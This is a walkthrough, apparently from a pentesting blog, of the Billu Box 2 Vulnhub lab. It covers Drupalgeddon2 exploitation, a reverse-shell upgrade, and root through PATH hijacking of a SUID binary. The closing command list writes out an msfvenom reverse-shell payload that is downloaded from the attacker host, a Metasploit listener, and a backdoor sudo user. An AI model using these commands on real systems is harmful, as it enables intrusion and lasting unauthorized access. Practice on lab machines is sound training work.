This is the Billi Box 2 Vulnhub walkthrough. Here’s what you will learn from this walkthrough. One thing you will learn is how to do binary analysis for Linux privilege escalation, but that is all I will give away. This is an excellent OSCP like box you can use to practice for the OSCP exam for free.
Table of Contents
What is an OSCP-like box?
An OSCP-like box is one that is more realistic in its intended exploitation than other boxes that rely on less practical exploit methodologies such as steganography, cracking complex hash sequences, etc. In a nutshell, it means that the box is something you could expect to see in use in real life. You won’t find mind puzzles and abstract sudoku-like challenges in these boxes.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Here’s What You Need
- Billu Box 2 VM from vulnhub
- Kali Linux VM from Offensive Security
Initial Enumeration
We kick off the initial enumeration stage with a simple nmap scan of the target using the command
It looks like ssh is open, but we will focus on the other open ports. There are two open web services on port 80 and port 8080. Let’s start with 80.
Get Your First Shell
We quickly find that the site is running a Drupal installation. That brings to mind several Drupal exploits, let’s try Drupalgeddon2. We grab the exploit from Github using the command
Upgrade Your Shell
As of now we have a limited web shell on the target, but we can upgrade to a better one. To do this we start a netcat listener on the Kali Linux machine and then execute a reverse shell payload written in Python as a oneliner on the target. There are two more steps to fully upgrade though.
We need to use
Linux Privilege Escalation
The initial enumeration for Linux privilege escalation seems to suggest that the SUID binary exploitation is the way to go here. After we run the command
Let’s take a look at this file named “s” in the opt directory. Now usually we can inspect a vulnerable cron job or a bash script, but in this case we are going after a SUID binary so strings will help here.
What we find is that one line reads “scp -r /root/* ….” so what does that mean? It appears that the scp command is copying blah blah, but wait! scp is not specified in its absolute path form. That means we can hijack the execution by jumping in the way of the PATH variable.
To do this we will add the tmp folder to the PATH variables so that the system will search first in the tmp folder for the scp binary. Then we make a reverse shell payload using msfvenom (think about how you can do this without Metasploit…).
And then we serve the payload and make a call to download it from the target.
Once you are root there is nothing else to do.
Here is an overview of all the commands we used in this Billu Box 2 Vulnhub walkthrough.
# initial enumeration
nmap -sC -sT -sV -p- 10.0.50.63
# get your first shell
git clone https://github.com/dreadlocked/Drupalgeddon2
cd Drupalgeddon2
chmod +x drupalgeddon2.rb
ruby drupalgeddon2.rb http://10.0.50.63:80
# upgrade to a fully interactive TTY shell
python -c 'import ..;'
[-] The target timed out ~ Net::ReadTimeout with #<TCPSocket:(closed)>
# stabillize this place
python -c 'import pty;pty.spawn("/bin/bash")'
stty -echo
# alter the search order for the PATH
PATH=/tmp:$PATH
msfvenom -p linux/x86/shell/reverse_tcp LPORT=1234 LHOST=10.0.50.58 -f elf > scp
PATH=/tmp:$PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# put the evil scp in the right spot
wget http://10.0.50.58/scp -O /tmp/scp
cd /tmp
chmod +x scp
cd /opt
./s
# start a staged listen in Metasploit
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
# make a new user we can use to ssh to the box with
useradd -m -s /bin/bash -p $(openssl passwd -1 "Password1") guru
# add the new user to the sudoers group
usermod -aG sudo guru
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.